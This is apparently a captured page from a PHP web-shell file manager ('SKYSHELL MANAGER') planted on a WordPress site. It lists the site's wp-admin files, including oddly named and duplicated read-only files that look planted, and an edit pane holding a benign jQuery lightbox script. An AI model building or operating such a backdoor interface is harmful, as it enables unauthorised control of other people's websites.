📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: jquery.simple-lightbox.js
/* -------------------------------------------------------- Code for jquery.simpleLightbox() version: 0.0.1 author: Thomas Schwarz email: info@thomasschwarz-websolutions.de website: https://www.thomasschwarz-websolutions.de License: MIT _____ _ ___ _ ___ __ |_ _| |_ ___ _ __ __ _ __/ __| __| |___ __ ____ _ _ _ ___/ _ \/ / | | | ' \/ _ \ ' \/ _` (_-<__ \/ _| ' \ V V / _` | '_|_ /\_, / _ \ |_| |_||_\___/_|_|_\__,_/__/___/\__|_||_\_/\_/\__,_|_| /__| /_/\___/ ----------------------------------------------------------*/ (function ( $ ) { /* * _removeLightbox * Remove all open lightbox's. */ var _removeLightbox = function(event) { // Check if we have an event. if (typeof event !== 'undefined') { // Get class name of clicked element. var className = event.target.className; // Check for clicked target. if (className == 'sl-wrapper' || className == 'sl-close') { // Get all elements. var elements = document.getElementsByClassName('sl-wrapper'); // Check if we had elements. if (elements.length) { // Remove all. while(elements.length > 0) { elements[0].remove(); } } } } } /* * _createStructure * Creates new HTML structure for the lightbox. */ var _createStructure = function(link) { // Create new element and structure. var lightbox = document.createElement('div'), structure = '<div class="sl-content">' + '<span class="sl-close"></span>' + '<img src="' + link + '" alt="Simple Lightbox" />' + '</div>'; // Set class for new element. lightbox.className = 'sl-wrapper'; // Append structure for content. lightbox.innerHTML = structure; return lightbox; } /* * _openLightbox * Create and open the simple lightbox. */ var _openLightbox = function(element, options) { // Remove all elements. _removeLightbox(); // Create new lightbox. // -> get source of clicked element. var lightbox = _createStructure(element.getAttribute(options.source)); // Append new lightbox to document. document.body.appendChild(lightbox); // Add "close" event listener on click. document.querySelector('.sl-wrapper') .addEventListener('click', _removeLightbox, false); } /* * simpleLightbox * plugin definition. */ $.fn.simpleLightbox = function( options ) { // Set default options. var settings = $.extend({ source: 'src', trigger: 'img' }, options ); // Get all trigger elements by options.trigger. var triggerElements = document.querySelectorAll(settings.trigger); // Add event listener on trigger elements for click. for (var i = 0; i < triggerElements.length; i++) { triggerElements[i].addEventListener('click', function(element) { _openLightbox(element.target, settings); }); } return this; }; }( jQuery ));
Save